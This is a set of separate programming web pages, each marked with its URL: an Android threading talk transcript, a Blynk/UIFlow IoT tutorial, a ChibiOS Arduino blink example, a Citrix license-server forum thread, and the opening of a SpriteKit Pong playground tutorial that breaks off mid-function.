    private class DownloadImageTask extends AsyncTask<String, Void, Bitmap> {
        protected Bitmap doInBackground(String... urls) {
            return loadImageFromNetwork(urls[0]);
        }

        protected void onPostExecute(Bitmap result) {
            mImageView.setImageBitmap(result);
        }
    }
}

Here I've just declared a task that extends AsyncTask, and then I just execute it and run it in the background. Once it's done being able to load that information, it puts it right back in the image. If I had those elements, the user can still interact with my app. I'm still prioritizing how I'm actually loading information, but I'm not interfering with what they're doing. This would be good for something like user logins, since that's not something that needs to be used in other activities. If you have an object that is directly related to what is going on in that Activity, AsyncTask is a very good tool to use.

HandlerThread (9:35)

Here we have HandlerThread. This is a relatively new thing that they put out, and there's not a lot of great documentation on it. If we just want to be able to make something run in the background, we can do what I call the "basic version":

HandlerThread handlerThread = new HandlerThread("newHandlerThread");
handlerThread.start();

Handler myHandler = new Handler(handlerThread.getLooper());
myHandler.post(new Runnable() {...});

We declare a new HandlerThread and give it a name. We tell it to start, but then we have to give it a Looper task. What does Looper actually do? We're generating a thread that we're giving a task, but we're also saying, "Hey, I want this thread to stay alive." Maybe I'm actually executing multiple image cachings: I don't want that thread to die, because every time I generate a new thread, that's more work that has to go on.
However, you must also be careful with this, because you can end up having a thread that never dies. (That could be good or bad.) If you're not using that thread, you have computation that is continually going on in the background, and you are using system resources. It's not like it just stays there. What is it for? Why would I want to have something like this actually run? Suppose I have a task where I have no idea whether it's going to take 5 seconds or 50 seconds? An AsyncTask might not be a good idea, because I might need it as a system resource, like the camera. Say I am Pokemon GO. If I'm trying to dynamically grab your camera for that AR mode every single time, and I didn't lock on it while you actually were using the application, it would take about two seconds of loading time in a lot of cases to be able to load and lock on to that resource. This is especially true if you're using older devices. Think beyond just cameras, though. Let's say you have a chat that's going back and forth like Google Hangouts. I'd want to have a Looper thread of the instance that I'm currently in to be able to make sure that I'm grabbing those messaging tasks and being able to post those to the front of the application, but also still be able to get those bits of information even if I go to another application. So, you know how you get those notifications saying, "Hey, somebody just sent you another message." You can still keep that instance going, and still keep that prioritization, without actually affecting what's immediately in front of them. If you did that with AsyncTask, that wouldn't be very good, because if they went to another app, the whole thing would lose Context.

Java 8 and MultiThreading (13:30)

Some new stuff happened in Java 8 that actually affects threading. The big change we are going to focus on is lambda expressions.
My seededRandom example above took all this code to write it:

private class RandomThread extends Thread {
    long seed;

    RandomThread(long seed) {
        this.seed = seed;
    }

    @Override
    public void run() {
    }
}

That's not even talking about initialization. Now I can take all of that information and just make it a lambda expression (since Runnable's run() takes no arguments, the seed has to be captured from the enclosing scope rather than passed as a parameter):

// seed must be effectively final to be captured by the lambda
private Runnable randomThread = () -> {
    Random seededRandom = new Random(seed);
    rootRandom = seededRandom.nextInt();
};

That substantially decreased the amount of code that I actually have to write.

Advanced Threading (14:20)

Let's see a really basic example of what is called a "self-managed thread". Traditionally in Android, you're going to not declare things as a regular thread, but as a Runnable. It's just another variation of the regular thread class, but it's a more Android-specific version:

private class ConnectThread implements Runnable {
    @Override
    public void run() {
        while (!Thread.currentThread().isInterrupted()) {
            if (newConnection) {
                newConnection = false;
                SocketClass.startClient();
                new Thread(new TimeOutThread()).start();
            }
            if (serverReply != null) {
                if (serverReply.equals(Constants.ACK)
                        || serverReply.equals(Constants.NAK)
                        || serverReply.equals(Constants.STOP)) {
                    Thread.currentThread().interrupt();
                    sendCompleteEvent(serverReply);
                    return;
                }
            }
        }
    }
}

Once I'm spawning, I'm keeping myself alive, not with a Looper, but with the while statement. This is a manual example, a not-particularly-Android-y way to do it. In this example, I'm creating a socket-level connection with the server and getting very simple responses back. I'm actually spawning a second thread and causing a timeout. I don't have that thread on here, but you can tell by the name, TimeOutThread. I have to make sure that if I had a timeout condition, that I can close it and then close it again. I'm still keeping the thread alive even though I've spawned another, waiting to find out my server reply.
If I receive a response, I will interrupt the thread, causing a stop in the while loop, and say, "Okay, this event completed," and then I'll just return back. I've created a situation where I can actually start threads from within myself, and then once I know that that task is done, that whole thread closes down, and I'd be able to create self-managed tasks, so that I know what is going on at every moment.

Executors (17:59)

Executors help us in a huge way. I would not want to do that self-managed, spawning thread manually, or at least to that degree. An Executor basically executes Runnable tasks. Now, when we talk about Runnable tasks, we're literally talking about Runnables. We're not talking about the Thread class that we talked about at the very beginning of this presentation. So I can do two things with it: I can make asynchronous threads and spawn them, or I can actually have a situation where I'm making them fully synchronous. Let's say I have to create this new thread around a RunnableTask and call start():

(new Thread(RunnableTask)).start();

And that's assuming I have no other variables to pass into it. Now, with Executor, I can declare a single executor and be able to run multiple tasks on that one executor. That one executor will be able to generate multiple threads for me:

Executor executor = anExecutor();
executor.execute(new RunnableTask());
executor.execute(new NextRunnableTask());

I just want to be able to execute a single thread in one of my activities, or I have a custom view class or a service. And I just really want a direct call. The DirectExecutor is the most common implementation:

class DirectExecutor implements Executor {
    public void execute(Runnable task) {
        task.run();
    }
}

Here we're just giving it the simple Runnable task, and then just telling it to run. This way, they run in the same thread. This is more of a synchronous operation where we're executing one, then executing the next, then executing a third.
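A runnable sketch of that synchronous behavior: because DirectExecutor runs each task on the calling thread, both tasks have completed before execution continues. The counter is only there to make the ordering observable, and the demo class name is made up:

```java
import java.util.concurrent.Executor;
import java.util.concurrent.atomic.AtomicInteger;

public class DirectExecutorDemo {
    // Runs each task immediately on the calling thread (synchronous)
    static class DirectExecutor implements Executor {
        public void execute(Runnable task) {
            task.run();
        }
    }

    public static void main(String[] args) {
        AtomicInteger counter = new AtomicInteger();
        Executor executor = new DirectExecutor();
        executor.execute(counter::incrementAndGet);
        executor.execute(counter::incrementAndGet);
        // Both tasks have already finished by this point
        System.out.println(counter.get());  // prints 2
    }
}
```

Swap in the ThreadPerTaskExecutor described next and the same two execute() calls become concurrent, which is exactly the trade-off the talk is drawing.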
Now if I want to be able to generate new threads every single time, I would use the ThreadPerTaskExecutor:

class ThreadPerTaskExecutor implements Executor {
    public void execute(Runnable task) {
        new Thread(task).start();
    }
}

In the execute function, I'm generating a new thread each time that I get a new task put into it.

ThreadPoolExecutor (20:31)

Unless you have one or two simple operations, you should probably be using what's called a ThreadPoolExecutor. In ThreadPerTaskExecutor, I generate a thread, they do their stuff, and then they die. If I constantly have new stuff coming up, other stuff dying, that becomes a lot of work for me to be able to track. ThreadPoolExecutor is instantiated very similarly to how we instantiate Executor normally:

ThreadPoolExecutor mThreadPool = new ThreadPoolExecutor(
        // initial processor pool size
        Runtime.getRuntime().availableProcessors(),
        // max processor pool size
        Runtime.getRuntime().availableProcessors(),
        // time to keep alive
        3,
        // TimeUnit for keep alive
        TimeUnit.SECONDS,
        // queue of Runnables
        mWorkQueue);

In the beginning, we need to make sure that we actually create that thread pool. Now I'm putting in some random kind of numbers here as examples, but you may not want to have every processor core be able to be used as part of your thread pool. And you want to be able to reuse that thread pool for as long as you actually need those pieces to go. You could have a situation where you have an application that has multiple ThreadPoolExecutors. If I have a thread pool that I need to have dedicated to preloading images, that would be a good reason to have its own thread pool. But if you're talking about something where I want to be able to constantly access it, I've got an API that I'm constantly hitting, or multiple APIs, hey, I might want to keep one ThreadPoolExecutor just for that purpose. And it might be my general purpose ThreadPoolExecutor because I always have stuff that's running.
I never really truly need to close it down unless I'm no longer using the application.

public class MyTaskManager {
    //...
    // Run the task on the pool
    mThreadPool.execute(someTask.getRunnable());
    //...
    // Now, when done
    mThreadPool.shutdown();
}

The most common thing I see happen is they're like, "Oh, thread pool executors, great. I need to thread pool execute every single thing." No. No, you don't. You need to make sure that you're using it only in instances where you are going to constantly be needing the workers that are in that container. Once you are done, you need to shut it down. This is why I make sure to put mThreadPool.shutdown(). When you are done with those tasks, kill those worker threads.

Executor Services (23:44)

This is really related to Futures, but you can see it's very similar to when we're talking about the standard Executor, except that I'm doing this on a fixed thread pool, so I don't have the ability to change some of those parameters:
I commonly see the situation where you have leaked Messages, and Observables, and things that are still active, because people didn’t know that they should close it down. It’s not perfect, because it’s taking a general execution model to what might be a very specific problem that you have. In a self-propagating process where I’m doing extra spawning, I might want to have some things run concurrently and other things run synchronously. It’s going to be a lot harder for you to set that up in RxJava. So what does RxJava actually give us? If you’re looking at being able to simply pass bits of information from one activity or class to another, RxJava can make it quite easy to gather that and then be able to return back just those objects. It can significantly simplify the writing of modules. For logins, I can write a very short bit of RxJava code to be able to handle login, and I don’t have to write three or four little threads to be able to handle all of the eccentricities oAuth and all these other problems that you’ve had if you’ve tried to actually build your own login service. It’s also very easy to set up communication between multiple threads. If you have information that needs to be passed back and forth between multiple threads, you don’t have to build it manually. It’s good if you need to serialize results. You can do that in RxJava without too much work, and you don’t have to think about how the processes are actually operating in your head. The biggest challenge that a lot of people have is being able to understand when do you need to have concurrent information, and when do you need to have things that are basically in a line. Retrofit A lot of us use Retrofit. I use it a lot, actually. It really, really simplifies calls to your RESTful APIs, and it’s a specialty-built thing. It uses RxJava in the backend, but remember that it’s using RxJava in a very specific capacity, and it’s been optimized for that. 
It’s very good at handling your RESTful call, giving you back the information, and turning it into an interface so that you don’t really have to know that much about being able to do custom API calls. Bolts-Android Bolts-Android has been open sourced by Parse and Facebook. They use it within their application. It’s a good event-based model to be able to work back and forth. It doesn’t have as many advanced features, but if you’re looking to do things that are very simple from a call and execute system, Bolts Android is a very good library because it’s very purpose-built. Picasso and Glide Picasso and Glide handle things a little bit differently in terms of threading under the hood, even though they have very similar results in terms of thread performance. They’re both specialty packages built to be image loaders. Glide actually uses thread pool executor and a lot of specialty Handlers on the underside. Depending on what version of Picasso you have, it’s primarily using ThreadPoolExecutor, and some newer stuff I’ve seen actually uses RxJava in the back end. Q&A (29:43) Q: If I were to make a custom image loader, what kind of threads or thread management would I want to be able to put together if I were not using a library? Stacy: I would use ThreadPoolExecutor in combination with other threads to accomplish it. I would also make a Runnable or a new Thread to handle different tasks. So I’d have the situation where I’d say, Okay, I want to have this thread pool, but here I want to actually download the image.” Once I’m done downloading the image, maybe I do resize, maybe I do something else after that, and have that all run within that single execution. But when I’m done with it, what might I want to do with that thread pool? Stop it, shut it down. Now, an important thing I didn’t bring up in here is that thread pools don’t immediately shut down. You send a shutdown signal. 
So when I say shutdown(), I’m telling it, “Hey, once you’re finished, I need you to shut down.” But what if I have a thread that’s just gone crazy, a thread that I’ve passed something to, and it just doesn’t want to die, a zombie thread? What I can do in that situation is can say, “Hey, after a certain amount of time, do these threads execute” what they need to, and then shut down? If they didn’t, I can tell it to shut down now, right? It’s the difference between when you hit the power button on your computer to say, “I need this off. I just got a million things” of spyware, it won’t go down.” Q: If I’m making a custom Executor and passing a bunch of threads to it, what would you recommend is the best way to pass information back to the main thread? Stacy: So the same way that you saw that I did things in that kinda simplified double spawning thread, right? I want to be able to either set a variable or be able to pass it back to some external class. So you would treat it just like you would passing information back from a standard method or function that you have. For AsyncTask, I’ve seen some weird stuff where somebody made a blank activity and a bunch of custom constructors around their AsyncTask system. Don’t do that. Keep it to the very simplified task that you just need in that one instance. So in your case, you really just want to treat it like you would any other information or any other function, because really, all you’re doing is just running other functions inside of another thread. The variables, you can quite easily pass those back. Q: What about Loaders? Stacy: Once you understand how these core four types of threading tools work, it’s very easy to be able to look at those other things like Loaders, and be able to see what it’s doing and what it’s returning back to you. Q: Is there a separate method to call in an instance where a thread is running out of control as a zombie? 
Stacy: Right, so what you would do is basically, once you hit your shutdown, you have another piece of code, like in a try-catch statement, to figure out, "Okay, I need to wait. Have I counted this many times, right? And if it doesn't shut down in a certain amount of time, I need to send what's called shutdownNow()." That is the power button for your threads.
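The shutdown-then-shutdownNow() sequence Stacy describes maps directly onto ExecutorService. Here is a minimal sketch of that pattern (the class and method names are illustrative, not from the talk):

```java
import java.util.concurrent.ExecutorService;
import java.util.concurrent.Executors;
import java.util.concurrent.TimeUnit;

// Sketch of the pattern from the talk: ask the pool to finish, wait a
// bounded amount of time, then force-kill any remaining zombie threads.
class GracefulShutdown {
    static boolean runDemo() {
        ExecutorService pool = Executors.newFixedThreadPool(2);
        pool.submit(() -> { /* a quick task */ });

        pool.shutdown();                       // "once you're finished, shut down"
        try {
            if (!pool.awaitTermination(2, TimeUnit.SECONDS)) {
                pool.shutdownNow();            // the "power button" for stuck threads
            }
        } catch (InterruptedException e) {
            pool.shutdownNow();
            Thread.currentThread().interrupt();
        }
        return pool.isTerminated();
    }

    public static void main(String[] args) {
        System.out.println("terminated cleanly: " + runDemo());
    }
}
```

awaitTermination() is the "wait and count" step: it blocks up to the timeout, and only if the pool still hasn't finished does the code fall back to the forced shutdownNow().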
https://academy.realm.io/posts/360andev-stacy-devino-async-tasks-threads-pools-executors-android/
This tutorial takes building a temperature and humidity collection node as an example to demonstrate how to access the Blynk cloud service platform from a UIFlow-programmed device, and how to implement simple remote control through the Blynk app. Before connecting, you need to register an account through the Blynk app, log in, and create an application instance to obtain the corresponding Auth Token.

Click here to visit the Blynk official website and install the Blynk APP. Click the +Add button in the app and create a project: set the device type to ESP32 Dev Board and the connection mode to Wi-Fi. After the project is created, the Blynk service generates a unique Auth Token for it and sends it to your registered mailbox. We will use this key in the subsequent steps.

After completing the project creation, you will enter the control panel, where you can add and customize controls through the sidebar. This case adds two Labeled Value controls to display the temperature and humidity data (set the refresh time to 1s), and a Button to control the speaker's sound.

Blynk distinguishes between "real pins" and "virtual pins". A real pin means that a level change made in the app is applied directly to the corresponding pin number on the hardware device. A virtual pin is best understood as an identifier: the app and the device program use it to exchange information, with custom handlers on each side. The application case below uses virtual pins.

Burn the UIFlow firmware to your device (firmware v1.7.4 or above is required), and click the corresponding document link below to view the detailed programming steps.

UIFlow firmware burning steps - Click to download the case program m5f file, open the file in UIFlow, or drag and drop the code blocks as shown in the picture below.
In the case program, the data is pushed to the app's display panel via the Blynk server by listening for data refresh requests. UIFlow also supports user-defined configuration of the Blynk server to connect to; you only need to pass the server IP and port parameters during the initialization phase of the program.

from IoTcloud import blynk

# Initialize the connection
blynk1 = blynk.Blynk(token='xxxxxxxxxxxxxxxxxxxxxxxxxx')

# Response callback
def blynk_read_v3(v_pin, value):
    print(value)
    # Respond with data on the specified virtual pin
    blynk1.virtual_write(v_pin, "Hello!")

# Bind a virtual pin to its response callback
blynk1.handle_event('read v3', blynk_read_v3)

# Disconnect
blynk1.disconnect()

# Send an email
blynk1.email('', '', '')

# Send a tweet
blynk1.tweet('')

# Send a push notification
blynk1.notify('')

# Configure control property parameters
blynk1.set_property(0, '', '')

# Synchronize virtual pin state
blynk1.virtual_sync(0)

while True:
    blynk1.run()

After the device has successfully connected to the network and is running the code, click the run button in the upper right corner of the app's project page to establish the cloud connection and obtain real-time temperature and humidity data. Click the SPK control button to make the device's speaker sound. Check the Blynk official documentation for more control-related content.
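The virtual-pin mechanism used above is essentially an event dispatch table keyed by a pin identifier. The following plain-Python sketch mimics that pattern of the case program; it is not the real blynk library:

```python
# A plain-Python sketch of the virtual-pin idea: an event dispatch table
# keyed by pin identifier. This mimics the Blynk pattern above; it is NOT
# the real blynk library.
class VirtualPins:
    def __init__(self):
        self.handlers = {}  # event name -> callback
        self.values = {}    # v_pin -> last value written

    def handle_event(self, event, callback):
        # e.g. handle_event('read v3', cb) binds a read handler to virtual pin 3
        self.handlers[event] = callback

    def virtual_write(self, v_pin, value):
        # the device pushes a value; the app side would render it
        self.values[v_pin] = value

    def simulate_read(self, v_pin):
        # the app asks for V<pin>: dispatch to the bound handler, if any
        event = 'read v%d' % v_pin
        if event in self.handlers:
            self.handlers[event](v_pin, self.values.get(v_pin))

pins = VirtualPins()
# Respond to a read request on V3 the same way blynk_read_v3 does above
pins.handle_event('read v3', lambda v_pin, value: pins.virtual_write(v_pin, "Hello!"))
pins.simulate_read(3)
print(pins.values[3])  # -> Hello!
```

The pin number never touches real hardware; it only identifies which handler runs and which stored value the app reads back, which is exactly why virtual pins are described as identifiers.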
https://docs.m5stack.com/en/uiflow/iotcloud/blynk
As promised yesterday, here's an example sketch which uses the ChibiOS RTOS to create a separate task for keeping an LED blinking at 2 Hz, no matter what else the code is doing:

#include <ChibiOS_AVR.h>

static WORKING_AREA(waThread1, 50);

void Thread1 () {
  const uint8_t LED_PIN = 9;
  pinMode(LED_PIN, OUTPUT);
  while (1) {
    digitalWrite(LED_PIN, LOW);
    chThdSleepMilliseconds(100);
    digitalWrite(LED_PIN, HIGH);
    chThdSleepMilliseconds(400);
  }
}

void setup () {
  chBegin(mainThread);
}

void mainThread () {
  chThdCreateStatic(waThread1, sizeof (waThread1),
                    NORMALPRIO + 2, (tfunc_t) Thread1, 0);
  while (true)
    loop();
}

void loop () {
  delay(1000);
}

There are several things to note about this approach:

- there's now a "Thread1" task, which does all the LED blinking, even the LED pin setup
- each task needs a working area for its stack, this will consume a bit of memory
- calls to delay() are forbidden inside threads, they need to play nice and go to sleep
- only a few changes are needed, compared to the original setup() and loop() code
- chBegin() is what starts the RTOS going, and mainThread() takes over control
- to keep things similar to what Arduino does, I decided to call loop() when idling

Note that inside loop() there is a call to delay(), but that's ok: at some point, the RTOS runs out of other things to do, so we might as well make the main thread similar to what the Arduino does. There is also an idle task – it runs (but does nothing) whenever no other tasks are asking for processor time.

Note that despite the delay call, the LED still blinks at the proper rate. You're looking at a real multitasking "kernel" running inside the ATmega328 here, and it's preemptive, which simply means that the RTOS can (and will) decide to break off any current activity, if there is something more important that needs to be done first. This includes suddenly disrupting that delay() call, and letting Thread1 run to keep the LEDs blinking.
In case you're wondering: this compiles to 3,120 bytes of code – ChibiOS is really tiny. Stay tuned for details on how to get this working in your projects… it's very easy!

You could also check out FreeRTOS, it seems to have a more flexible licensing option and runs on way more platforms. I have been using it for over a year and have only good things to say about it.

FreeRTOS and ChibiOS/RT are both excellent RTOSes. In my experience FreeRTOS is heavier on RAM and ROM usage. It runs fine with a few tasks on a MEGA, but you easily run out of RAM on the smaller AVRs. NilRTOS is even smaller (currently 600-1000 bytes of ROM). Looking at the roadmap of ChibiOS however, the idea of Giovanni is to use ChibiOS for 16/32-bit systems, and focus NilRTOS on the 8-bit systems like the AVR. And last but not least: the AVR port and RTOS-friendly libraries for Arduino are very well maintained, which I find a big plus for choosing either ChibiOS or NilRTOS…
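The key idea above - a preemptive scheduler keeps the blinker task running right through the main thread's delay() - can also be demonstrated on a desktop with standard C++ threads (plain std::thread here, not an RTOS, so the scheduling details differ):

```cpp
#include <atomic>
#include <cassert>
#include <chrono>
#include <thread>

// A background "blinker" keeps toggling while the main thread sits in one
// long sleep, mirroring how the RTOS keeps Thread1 blinking through delay(1000).
int blink_count_during_busy_work() {
    std::atomic<bool> running{true};
    std::atomic<int> toggles{0};

    std::thread blinker([&] {
        while (running) {
            ++toggles;  // stands in for digitalWrite() + chThdSleepMilliseconds()
            std::this_thread::sleep_for(std::chrono::milliseconds(20));
        }
    });

    // The "main loop": one long blocking call, like delay(1000) in the sketch.
    std::this_thread::sleep_for(std::chrono::milliseconds(200));

    running = false;
    blinker.join();
    return toggles;
}
```

Even though the main thread blocks for the entire 200 ms, the blinker still toggles roughly every 20 ms, because the scheduler (like the RTOS in the sketch) preempts and runs the other thread whenever it is due.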
http://jeelabs.org/2013/05/24/blinking-in-real-time/
If you opt for a different server with a different hostname, you'd need to reallocate the licenses on MyCitrix.com and reissue them for the second server and its hostname. If you had enough licenses, you could allocate half of your licenses to each, but that would be a waste since the farm can only talk to one of 'em.

I'm not recommending what comes next, but it would be possible to: 1. Bring up a license server with XYZ name, return the licenses on My Citrix, and reissue those licenses to another server. I only mention this as a complement to Carl's suggestion, in that he already hit the nail on the head with the most obvious fact that Citrix did finally extrapolate out the licensing component, but then put it on another server using Apache\Tomcat\httpd "stuff" that has caused me some issues in FIPS compliance areas, where I've had to replace their self-signed certificate with a Verisign 2048-bit RSA 256 certificate and then modify the httpd and SSL config files to disable SSL 2 and SSL 3 and force HIGH encryption cipher suites. But I digress.

If clustering is not an option, I would wonder why cloning is not an option. Is it a physical server? Now if we are talking about an active-active scenario then yes, I get it. That would make sense, although again you have 30 days, but your secondary site would be pointing to the primary, not another independent source.

All you need is an FQDN. You assign the FQDN name to the files you download. Create a DNS record. Make it a VIP if you want. I always recommend a new SSL certificate, and ALWAYS replace the self-signed certificate that Citrix places on the server along with the private key. Not only is it 1024-bit, but it is SHA-1. If that FQDN corresponds to a cluster IP, even better. If that FQDN corresponds to a LB VIP, good too. Now I mention those last two because your only other option is DNS round-robin for two servers sharing the same FQDN, unless you were to delegate that record to Netscaler and use GSLB, or an F5 LB VIP or Netscaler LB VIP with each license server added.
My issue with that primarily is I've always used a SQL cluster, and why waste two more VMs when you already have a SQL cluster, which in my case is always physical hardware. I simply won't sign off on a design without a physical cluster. Depending on the size of the environment you can leverage that cluster for more than just SQL, given the underlying Microsoft clustering options outside of SQL. Then, combined with DFS Namespace? I'm not even going to start on that one.

Also, the other advantage of having the same server FQDN waiting is that this server is also our SQL server that contains very critical databases. The SQL is backed up every night using Arcserve backup software. I didn't realize I had 30 days to move the licenses, so that eliminates any panic. But why go to all the trouble? You have more than enough time to rebuild the thing from scratch if necessary.

Cloning a VM is a bit of a trick question without knowing your hypervisor:
- VMware ESX
- Hyper-V
- XenServer

On FQDN, take note - I want to be clear that I did not say the same FQDN as the SQL Server. Not what I said, or if I did convey that, I did not mean to. SQL clustering has nothing to do with Windows clustering for network services, file services, or a licensing server. Nothing to do with SQL at all. You can install Microsoft clustering for two nodes and have a clustered file server. SQL has the added option of running in a cluster as well, but you must install that option. I've never needed more than two, so I've always used the 2-node cluster and quorum option. I've yet to try the SQL 2012 active state option.

The FQDN is just a DNS entry that points to a new cluster service that you manually create. You would assign another storage LUN, just like SQL, but for licensing only. The service you create with the server console is just a service that is tied to that LUN. Let's say that LUN is allocated to Server 1 and it is iSCSI, or in your case most likely Fibre, and allocated to an ESX host.
See, I stated physical hardware. Microsoft does not support SQL clustering on VMware ESX, although VMware will state they do. Does it work? Far as I can tell - yea. But someone concerned about Microsoft vendor support will want physical full servers or blades. Those blades will have two Fibre cards. Why two? What is the point of having a cluster if you have a single point of failure? Two Fibre cards plug into two different core switches, so that is four Fibre cards in two blades or servers, and four redundant connections, active aggregate or active\passive. Or, that could be iSCSI. Point is, the hardware is fully HA. Hot-swap drives, processors, memory, power supplies, plugged into separate PDUs, and in most cases those PDUs are on two different power grids. Getting the picture?

That FQDN is license-server specific. My point was that for Citrix I always use physical SQL clusters and only host the XenApp and XenDesktop databases, plus the license server. I stand up another SQL Server virtual machine for logging. I have dedicated Insight appliances per two Netscaler HA pairs, and two Director console servers behind a LB VIP with an FQDN and SSL certificate; that information goes to another virtual SQL server.

Your FQDN might be citrixlicensing.mycompany. But what if you have more than one farm? More than one domain namespace? That is a long conversation. For now, just know that the licensing FQDN is like a CNAME for both your license servers. You are hopefully going to get a certificate issued that matches that FQDN, and you would modify the HOSTS file on both servers to 127.0.0.1 citrixlicensing.mycompany.

You have three options from a DNS perspective now:
1. Round robin
2. Load balancing
3. Global load balancing - you must delegate that record

You said two sites. If you want immediate recovery, you delegate that FQDN to your GSLB appliance, like Netscaler - and by delegate I'm speaking to DNS. So Netscaler becomes the SOA for that DNS record.
Your internal DNS, whether AD-integrated or Infoblox, would have a delegation record configured. If your License Server Primary goes down, Netscaler immediately sends the traffic to the other Netscaler HA pair (I hope you have one) at the recovery site, and that traffic is forwarded to that license server.

Now, if all you want is a cold spare, I would stick with the 30-day philosophy. It is a waste of storage, IMO, other than DRE-related items. Hopefully your company has a disaster recovery plan and exercises. I do these quarterly, and at that time I take cloned images of all my infrastructure components and however many XenApp servers are required to meet the DRE testers' requirements. I have a recovery site where those are sent and activated on a separate network, but without a change to the IP addressing. No names change, no IPs change. Sounds like you have much to consider.
https://www.experts-exchange.com/questions/28716139/Need-a-second-Citrix-license-server.html
Building my WWDC Scholarship Submission

On March 13, 2018, Apple announced WWDC 2018. As in previous years, tickets were available via the ticket lottery, as well as through Apple's scholarship program, in which 350 students receive a free ticket and lodging for WWDC. Although I had just started learning Swift, I decided to try my luck and apply for a scholarship anyway. I was incredibly ecstatic to be awarded a scholarship, and in June 2018 I attended WWDC, learned a ton, and met tons of other scholars and Apple engineers. In this blog post, I will walk through how I created DoublePong, the Swift playground I submitted as my WWDC18 scholarship application.

DoublePong is an adaptation of the classic Pong game, with paddles on all four sides of the screen. In the original Mac version, DoublePong is played by moving your mouse horizontally or vertically to move the paddles. The adapted iOS version supports tilting your device or using your finger to control the paddles, but this tutorial will only cover the original macOS version.

⚠️ Note: I have not modified most of the code used in this blog post since my original WWDC scholarship submission, except to update it to work on the latest versions of Swift and Xcode. Some of this code does not exhibit best practices and shouldn't be reused, but it has been left to demonstrate how I created my original winning scholarship submission. To assist you, I have placed notices in some places where I feel this is prevalent.

Getting ready

Get started by creating an empty macOS playground in Xcode (File -> New -> Playground). Then, press Command-1 or select View -> Navigators -> Show Project Navigator to show Xcode's project navigator sidebar on the left with your playground's structure. To simplify some of the code in this post, I've created a small Swift file with some useful extensions, such as a convenient way to add multiple subviews.
Click below to download this file, which is required for some of the code we'll write later.

Download Required Materials

After downloading and extracting the archive, put Extensions.swift into your playground's Sources folder.

Setting up the scene

Under the hood, DoublePong uses SpriteKit, Apple's 2D game engine. To use it, we will create a custom SKScene and present it in our playground's 'live view'. Enable the playground's live view now by pressing Option-Command-Enter or clicking the overlapping circles on the top right of Xcode's toolbar to show the Assistant Editor.

Now that our playground is ready, navigate to the main playground file by clicking it in the project navigator, then add this code, which will set up our scene and show it in the live view in the Assistant Editor:

import AppKit
import SpriteKit
import PlaygroundSupport

scene.scaleMode = .aspectFit
let view = NSView(frame: CGRect(x: 0, y: 0, width: 640, height: 360))
let skView = SKView(frame: CGRect(x: 0, y: 0, width: 640, height: 360))
skView.presentScene(scene)
view.addSubview(skView)
PlaygroundPage.current.liveView = view

The above code sets the scale mode of our scene, then embeds it within a SKView which is embedded in an NSView, which we then display in the live view. You'll notice that this code won't compile yet, as we haven't created the scene that we are using. To allow us to use the scene everywhere, create a new file named Global.swift in the Sources folder, where we'll place all our global variables.

⚠️ Note: As per the note at the top of this post, some of the code shown here was written by me a long time ago, and isn't the best. In particular, you should avoid creating global variables as this can clutter your code. They have been used here because of the relatively small size of a playground and to simplify the code.
In the new file you created, make sure to import the AppKit and SpriteKit frameworks, then create a public constant for our scene:

import AppKit
import SpriteKit

public let scene = Scene()

We're getting closer, but our playground will still fail to run, because Xcode doesn't know what the class Scene is. To fix the issue, create a new file named Scene.swift in Sources, where we'll place all our custom scene code and override SKScene's default didMove(to:) function to set up our scene:

public class Scene: SKScene, SKPhysicsContactDelegate {
    // The scene was created. Set up the game elements and start the game.
    override public func didMove(to view: SKView) {
        // Set up the world physics
        physicsWorld.gravity = CGVector(dx: 0, dy: 0)
        physicsWorld.contactDelegate = self

        // Create a border in the view to keep the ball inside
        size = CGSize(width: 1920, height: 1080)
        let margin: CGFloat = 50
        let physicsBody = SKPhysicsBody(edgeLoopFrom: CGRect(x: margin, y: margin, width: size.width - margin * 2, height: size.height - margin * 2))
        physicsBody.friction = 0
        physicsBody.restitution = 0
        self.physicsBody = physicsBody
    }
}

As explained in the comments, the above code sets up our physics and 'contact delegate', which will let us receive notifications whenever two of our sprites, such as the ball and paddles we'll add later, collide (touch). Your playground will now run - but it's just an empty scene! In the next section, we'll add our sprites and allow the user to move their mouse to control the paddles.

Adding the sprites

Now that our playground runs, we need to add our ball and paddles, or we'll be stuck with an empty screen! Go back to Global.swift and add the following variables, which will hold our ball and each of our paddles. The additional constant, themeColor, can be any color you'd like and will be the color of all the sprites.
public let themeColor = NSColor.red
public var ball = SKShapeNode(circleOfRadius: 30)
public var topPaddle = SKSpriteNode()
public var leftPaddle = SKSpriteNode()
public var rightPaddle = SKSpriteNode()
public var bottomPaddle = SKSpriteNode()
public var randomObstacle = SKSpriteNode()

We also need to add some bit mask variables, so that SpriteKit knows which sprite is which and can tell us when they collide. Later on, we'll set up the paddles and ball with their bit masks and tell SpriteKit to notify us when a sprite collides with another bit mask.

public let Ball: UInt32 = 0x1 << 0
public let topPaddleI: UInt32 = 0x1 << 1
public let leftPaddleI: UInt32 = 0x1 << 2
public let rightPaddleI: UInt32 = 0x1 << 3
public let bottomPaddleI: UInt32 = 0x1 << 4
public let randomObstacleI: UInt32 = 0x1 << 5

Note that these are let constants, as we don't want them to change, while our sprites are variables, as we'll set them up separately in Scene.swift. Go to it now and we'll add a new function in which we'll set up our ball sprite:

func setupBall() {
    ball.name = "ball"
    ball.fillColor = themeColor
    ball.strokeColor = themeColor
    ball.position = CGPoint(x: CGFloat.random(in: 325...1595), y: CGFloat.random(in: 325...755))
    let physicsBody = SKPhysicsBody(circleOfRadius: 30)
    physicsBody.velocity = CGVector(dx: 400, dy: 400)
    physicsBody.friction = 0
    physicsBody.restitution = 1
    physicsBody.linearDamping = 0
    physicsBody.allowsRotation = false
    physicsBody.categoryBitMask = Ball
    physicsBody.contactTestBitMask = randomObstacleI
    ball.physicsBody = physicsBody
}

In the function, we're setting the name of the sprite so we can easily identify it later when detecting collisions. We're also positioning the ball at a random position within our game grid using the new CGFloat.random(in:) function introduced in Swift 4.2.
We then set the ball's SKPhysicsBody, which determines how the ball bounces and acts in the scene. Specifically:

- the friction is set to 0 to avoid it slowing down when it bounces, making the game fun
- the restitution is how much energy is lost when the ball bounces off another sprite
- the linearDamping is set to 0 so that no damping, which simulates air friction, is applied

We have now set up our ball, so if you add setupBall() to our didMove(to:) function from earlier and run the playground… nothing happens! This is because while we have now created and set up our ball, we still haven't added it to our actual scene. We'll set up our paddles and then return to this later, so we can add all our sprites together.

To set up the paddles, we'll add a new function named setupPaddles() where we'll set up all of our paddles:

func setupPaddles() {
    let randomHorizontalPosition = CGFloat.random(in: 325...1595)
    let horizontalPaddleSize = CGSize(width: 550, height: 50)
    let randomVerticalPosition = CGFloat.random(in: 325...755)
    let verticalPaddleSize = CGSize(width: 50, height: 550)
